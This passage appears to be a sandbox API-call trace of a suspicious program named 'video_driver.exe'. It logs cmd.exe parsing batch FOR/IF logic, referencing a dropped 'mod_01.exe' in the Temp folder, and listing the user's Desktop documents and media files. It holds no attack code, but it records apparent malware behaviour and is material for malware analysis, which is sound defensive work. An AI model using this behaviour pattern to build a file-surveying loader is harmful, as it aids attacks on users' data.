Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0056.687] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0056.688] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0056.689] GetProcessHeap () returned 0x7b0000 [0056.689] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x0, Size=0x20c) returned 0x7c3140 [0056.689] GetConsoleTitleW (in: lpConsoleTitle=0x7c3140, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0056.747] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0056.747] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0056.748] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0056.748] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0056.748] GetProcessHeap () returned 0x7b0000 [0056.748] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x400a) returned 0x7c65f0 [0056.748] GetProcessHeap () returned 0x7b0000 [0056.748] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.749] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x28) returned 0x7c3358 [0056.749] GetEnvironmentVariableW (in: lpName="i in ('dir /b \"", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="CD") returned 6 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="ERRORLEVEL") returned 4 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="CMDEXTVERSION") returned 6 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="CMDCMDLINE") returned 6 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="DATE") returned 5 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="TIME") returned -11 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="RANDOM") returned -9 [0056.749] _wcsicmp (_String1="i in ('dir /b \"", _String2="HIGHESTNUMANODENUMBER") returned 1 [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c3358 | out: hHeap=0x7b0000) returned 1 [0056.749] GetProcessHeap () returned 0x7b0000 [0056.749] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.750] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x12) returned 0x7b12a8 [0056.750] GetEnvironmentVariableW (in: lpName="TEMP", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 0x24 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b12a8 | out: hHeap=0x7b0000) returned 1 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.750] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0056.750] GetProcessHeap () returned 0x7b0000 [0056.750] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x1a) returned 0x7b0830 [0056.751] GetEnvironmentVariableW (in: lpName="username", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="5p5NrGJn0jS HALPmcxz") returned 0x14 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.751] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.751] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0056.751] GetProcessHeap () returned 0x7b0000 [0056.751] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.751] GetProcessHeap () returned 0x7b0000 [0056.752] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x18) returned 0x7b12a8 [0056.752] GetEnvironmentVariableW (in: lpName="p IN (\"", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="CD") returned 13 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="ERRORLEVEL") returned 11 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="CMDEXTVERSION") returned 13 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="CMDCMDLINE") returned 13 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="DATE") returned 12 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="TIME") returned -4 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="RANDOM") returned -2 [0056.752] _wcsicmp (_String1="p IN (\"", _String2="HIGHESTNUMANODENUMBER") returned 8 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b12a8 | out: hHeap=0x7b0000) returned 1 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.752] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7b0830 | out: hHeap=0x7b0000) returned 1 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.752] GetProcessHeap () returned 0x7b0000 [0056.752] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x4008) returned 0x7ca608 [0056.753] GetProcessHeap () returned 0x7b0000 [0056.753] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7ca608 | out: hHeap=0x7b0000) returned 1 [0056.753] GetProcessHeap () returned 0x7b0000 [0056.753] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c65f0 | out: hHeap=0x7b0000) returned 1 [0056.753] _wcsicmp (_String1="if", _String2=")") returned 64 [0056.753] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0056.753] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0056.753] _wcsicmp (_String1="IF", _String2="if") returned 0 [0056.753] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0056.753] GetProcessHeap () returned 0x7b0000 [0056.753] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c3358 [0056.753] GetProcessHeap () returned 0x7b0000 [0056.753] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xe) returned 0x7c02c0 [0056.754] GetProcessHeap () returned 0x7b0000 [0056.754] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.754] GetProcessHeap () returned 0x7b0000 [0056.754] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7b0830, Size=0x16) returned 0x7b12a8 [0056.754] GetProcessHeap () returned 0x7b0000 [0056.754] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7b12a8) returned 0x16 [0056.755] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0056.755] GetProcessHeap () returned 0x7b0000 [0056.755] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c33b8 [0056.755] GetProcessHeap () returned 0x7b0000 [0056.755] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x14) returned 0x7c3418 [0056.755] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0056.755] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0056.757] GetProcessHeap () returned 0x7b0000 [0056.757] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x5a) returned 0x7c3438 [0056.757] GetProcessHeap () returned 0x7b0000 [0056.757] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xac) returned 0x7c34a0 [0056.757] GetProcessHeap () returned 0x7b0000 [0056.757] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c34a0, Size=0x5c) returned 0x7c34a0 [0056.757] GetProcessHeap () returned 0x7b0000 [0056.757] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c34a0) returned 0x5c [0056.757] _wcsicmp (_String1="for", _String2=")") returned 61 [0056.757] _wcsicmp (_String1="FOR", _String2="for") returned 0 [0056.757] _wcsicmp (_String1="FOR/?", _String2="for") returned 47 [0056.757] GetProcessHeap () returned 0x7b0000 [0056.758] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c3508 [0056.758] GetProcessHeap () returned 0x7b0000 [0056.758] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x44) returned 0x7c3568 [0056.758] GetProcessHeap () returned 0x7b0000 [0056.758] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x14) returned 0x7c35b8 [0056.758] GetProcessHeap () returned 0x7b0000 [0056.758] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c35b8, Size=0x12) returned 0x7c35b8 [0056.758] GetProcessHeap () returned 0x7b0000 [0056.758] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c35b8) returned 0x12 [0056.758] _wcsicmp (_String1="/L", _String2="/F") returned 6 [0056.758] _wcsicmp (_String1="/D", _String2="/F") returned -2 [0056.758] _wcsicmp (_String1="/F", _String2="/F") returned 0 [0056.759] _wcsicmp (_String1="/L", _String2="%i") returned 10 [0056.759] _wcsicmp (_String1="/D", _String2="%i") returned 10 [0056.759] _wcsicmp (_String1="/F", _String2="%i") returned 10 [0056.759] _wcsicmp (_String1="/R", _String2="%i") returned 10 [0056.759] _wcsicmp (_String1="IN", _String2="in") returned 0 [0056.760] GetProcessHeap () returned 0x7b0000 [0056.760] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x12) returned 0x7c35d8 [0056.760] GetProcessHeap () returned 0x7b0000 [0056.760] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c35d8, Size=0x18) returned 0x7c35d8 [0056.760] GetProcessHeap () returned 0x7b0000 [0056.760] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c35d8) returned 0x18 [0056.762] GetProcessHeap () returned 0x7b0000 [0056.762] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c35d8, Size=0x72) returned 0x7c35d8 [0056.762] GetProcessHeap () returned 0x7b0000 [0056.762] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c35d8) returned 0x72 [0056.763] _wcsicmp (_String1="DO", _String2="do") returned 0 [0056.764] _wcsicmp (_String1="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"", _String2=")") returned -7 [0056.764] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"") returned 68 [0056.764] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"") returned 68 [0056.764] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"") returned 71 [0056.765] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"") returned 71 [0056.765] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"") returned 80 [0056.765] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\"") returned 80 [0056.765] GetProcessHeap () returned 0x7b0000 [0056.765] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c3658 [0056.765] GetProcessHeap () returned 0x7b0000 [0056.765] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x6c) returned 0x7c36b8 [0056.768] GetProcessHeap () returned 0x7b0000 [0056.768] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x158) returned 0x7c3730 [0056.768] GetProcessHeap () returned 0x7b0000 [0056.768] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c3890 [0056.769] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c38f0 [0056.769] GetProcessHeap () returned 0x7b0000 [0056.769] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x10) returned 0x7c02d8 [0056.769] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x70) returned 0x7c4470 [0056.770] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c44e8 [0056.770] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c4548 [0056.770] GetProcessHeap () returned 0x7b0000 [0056.770] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x44) returned 0x7c45a8 [0056.770] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x14) returned 0x7c3950 [0056.770] GetProcessHeap () returned 0x7b0000 [0056.770] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c3950, Size=0x12) returned 0x7c3950 [0056.770] GetProcessHeap () returned 0x7b0000 [0056.770] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c3950) returned 0x12 [0056.770] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0056.770] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0056.771] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x5c) returned 0x7c45f8 [0056.771] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c4660 [0056.771] GetProcessHeap () returned 0x7b0000 [0056.771] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x14) returned 0x7c3970 [0056.771] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x20) returned 0x7b0830 [0056.775] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x208, lpBuffer=0x3ef2b8, lpFilePart=0x3ef064 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x3ef064*=0x0) returned 0x26 [0056.775] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0056.775] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0056.775] GetProcessHeap () returned 0x7b0000 [0056.775] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x2c) returned 0x7c46c0 [0056.775] GetProcessHeap () returned 0x7b0000 [0056.775] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xc) returned 0x7c02f0 [0056.775] GetProcessHeap () returned 0x7b0000 [0056.775] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xc) returned 0x7c0308 [0056.775] GetProcessHeap () returned 0x7b0000 [0056.775] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xe) returned 0x7c0320 [0056.775] _wpopen (_Command="dir /b \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*.*\"", _Mode="rb") returned 0x77032960 [0056.940] feof (_File=0x77032960) returned 0 [0056.940] ferror (_File=0x77032960) returned 0 [0056.940] GetProcessHeap () returned 0x7b0000 [0056.940] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x108) returned 0x7c4938 [0056.940] fgets (in: _Buf=0x7c4940, _MaxCount=256, _File=0x77032960 | out: _Buf="47Upt ff5iyL.avi\r\n", _File=0x77032960) returned="47Upt ff5iyL.avi\r\n" [0057.272] feof (_File=0x77032960) returned 0 [0057.272] ferror (_File=0x77032960) returned 0 [0057.272] GetProcessHeap () returned 0x7b0000 [0057.272] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c4938, Size=0x208) returned 0x7c4938 [0057.272] GetProcessHeap () returned 0x7b0000 [0057.272] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c4938) returned 0x208 [0057.272] fgets (in: _Buf=0x7c4952, _MaxCount=494, _File=0x77032960 | out: _Buf="8v1Sb42C0-_SO.xls\r\n", _File=0x77032960) returned="8v1Sb42C0-_SO.xls\r\n" [0057.274] feof (_File=0x77032960) returned 0 [0057.274] ferror (_File=0x77032960) returned 0 [0057.274] GetProcessHeap () returned 0x7b0000 [0057.274] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c4938, Size=0x308) returned 0x7c4938 [0057.274] GetProcessHeap () returned 0x7b0000 [0057.274] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c4938) returned 0x308 [0057.274] fgets (in: _Buf=0x7c4965, _MaxCount=731, _File=0x77032960 | out: _Buf="8ZRp Yo.mp4\r\n", _File=0x77032960) returned="8ZRp Yo.mp4\r\n" [0057.275] feof (_File=0x77032960) returned 0 [0057.275] ferror (_File=0x77032960) returned 0 [0057.275] fgets (in: _Buf=0x7c4972, _MaxCount=718, _File=0x77032960 | out: _Buf="buFx.bmp\r\n", _File=0x77032960) returned="buFx.bmp\r\n" [0057.276] feof (_File=0x77032960) returned 0 [0057.276] ferror (_File=0x77032960) returned 0 [0057.276] fgets (in: _Buf=0x7c497c, _MaxCount=708, _File=0x77032960 | out: _Buf="FJg6m_dnHXJPIeQU.pps\r\n", _File=0x77032960) returned="FJg6m_dnHXJPIeQU.pps\r\n" [0057.277] feof (_File=0x77032960) returned 0 [0057.277] ferror (_File=0x77032960) returned 0 [0057.277] fgets (in: _Buf=0x7c4992, _MaxCount=686, _File=0x77032960 | out: _Buf="Hjb-m4EYHMa7GTDEF.doc\r\n", _File=0x77032960) returned="Hjb-m4EYHMa7GTDEF.doc\r\n" [0057.278] feof (_File=0x77032960) returned 0 [0057.278] ferror (_File=0x77032960) returned 0 [0057.278] fgets (in: _Buf=0x7c49a9, _MaxCount=663, _File=0x77032960 | out: _Buf="HMYVWNui_rNMPXSZ.bmp\r\n", _File=0x77032960) returned="HMYVWNui_rNMPXSZ.bmp\r\n" [0057.279] feof (_File=0x77032960) returned 0 [0057.279] ferror (_File=0x77032960) returned 0 [0057.279] fgets (in: _Buf=0x7c49bf, _MaxCount=641, _File=0x77032960 | out: _Buf="i0eSQ.mp3\r\n", _File=0x77032960) returned="i0eSQ.mp3\r\n" [0057.280] feof (_File=0x77032960) returned 0 [0057.280] ferror (_File=0x77032960) returned 0 [0057.280] fgets (in: _Buf=0x7c49ca, _MaxCount=630, _File=0x77032960 | out: _Buf="isH8zy.flv\r\n", _File=0x77032960) returned="isH8zy.flv\r\n" [0057.281] feof (_File=0x77032960) returned 0 [0057.281] ferror (_File=0x77032960) returned 0 [0057.281] fgets (in: _Buf=0x7c49d6, _MaxCount=618, _File=0x77032960 | out: _Buf="KaGXpX_uv.docx\r\n", _File=0x77032960) returned="KaGXpX_uv.docx\r\n" [0057.282] feof (_File=0x77032960) returned 0 [0057.282] ferror (_File=0x77032960) returned 0 [0057.282] fgets (in: _Buf=0x7c49e6, _MaxCount=602, _File=0x77032960 | out: _Buf="KGvZ520tJ.ods\r\n", _File=0x77032960) returned="KGvZ520tJ.ods\r\n" [0057.283] feof (_File=0x77032960) returned 0 [0057.283] ferror (_File=0x77032960) returned 0 [0057.283] fgets (in: _Buf=0x7c49f5, _MaxCount=587, _File=0x77032960 | out: _Buf="mcjVmrm7V7AJ6t.odt\r\n", _File=0x77032960) returned="mcjVmrm7V7AJ6t.odt\r\n" [0057.284] feof (_File=0x77032960) returned 0 [0057.284] ferror (_File=0x77032960) returned 0 [0057.284] fgets (in: _Buf=0x7c4a09, _MaxCount=567, _File=0x77032960 | out: _Buf="mfZck7HwXf4SziBj\r\n", _File=0x77032960) returned="mfZck7HwXf4SziBj\r\n" [0057.285] feof (_File=0x77032960) returned 0 [0057.285] ferror (_File=0x77032960) returned 0 [0057.285] fgets (in: _Buf=0x7c4a1b, _MaxCount=549, _File=0x77032960 | out: _Buf="moG2C7rzW\r\n", _File=0x77032960) returned="moG2C7rzW\r\n" [0057.286] feof (_File=0x77032960) returned 0 [0057.286] ferror (_File=0x77032960) returned 0 [0057.286] fgets (in: _Buf=0x7c4a26, _MaxCount=538, _File=0x77032960 | out: _Buf="n8BHx-R0jAFi.mkv\r\n", _File=0x77032960) returned="n8BHx-R0jAFi.mkv\r\n" [0057.287] feof (_File=0x77032960) returned 0 [0057.287] ferror (_File=0x77032960) returned 0 [0057.287] fgets (in: _Buf=0x7c4a38, _MaxCount=520, _File=0x77032960 | out: _Buf="nF mzbmLsvv0e1OlZm.gif\r\n", _File=0x77032960) returned="nF mzbmLsvv0e1OlZm.gif\r\n" [0057.288] feof (_File=0x77032960) returned 0 [0057.288] ferror (_File=0x77032960) returned 0 [0057.288] GetProcessHeap () returned 0x7b0000 [0057.288] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c4938, Size=0x408) returned 0x7c4938 [0057.288] GetProcessHeap () returned 0x7b0000 [0057.288] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c4938) returned 0x408 [0057.288] fgets (in: _Buf=0x7c4a50, _MaxCount=752, _File=0x77032960 | out: _Buf="q8JQsFRXk.mp4\r\n", _File=0x77032960) returned="q8JQsFRXk.mp4\r\n" [0057.289] feof (_File=0x77032960) returned 0 [0057.289] ferror (_File=0x77032960) returned 0 [0057.289] fgets (in: _Buf=0x7c4a5f, _MaxCount=737, _File=0x77032960 | out: _Buf="RlpYGAIBP9RiAuiDEA1C.bmp\r\n", _File=0x77032960) returned="RlpYGAIBP9RiAuiDEA1C.bmp\r\n" [0057.290] feof (_File=0x77032960) returned 0 [0057.290] ferror (_File=0x77032960) returned 0 [0057.290] fgets (in: _Buf=0x7c4a79, _MaxCount=711, _File=0x77032960 | out: _Buf="video_driver.exe\r\n", _File=0x77032960) returned="video_driver.exe\r\n" [0057.291] feof (_File=0x77032960) returned 0 [0057.291] ferror (_File=0x77032960) returned 0 [0057.291] fgets (in: _Buf=0x7c4a8b, _MaxCount=693, _File=0x77032960 | out: _Buf="vvdZxZXGy537svJ.mp4\r\n", _File=0x77032960) returned="vvdZxZXGy537svJ.mp4\r\n" [0057.292] feof (_File=0x77032960) returned 0 [0057.292] ferror (_File=0x77032960) returned 0 [0057.292] fgets (in: _Buf=0x7c4aa0, _MaxCount=672, _File=0x77032960 | out: _Buf="Yt6rrVQUgdZ1oPy.gif\r\n", _File=0x77032960) returned="Yt6rrVQUgdZ1oPy.gif\r\n" [0057.294] feof (_File=0x77032960) returned 0 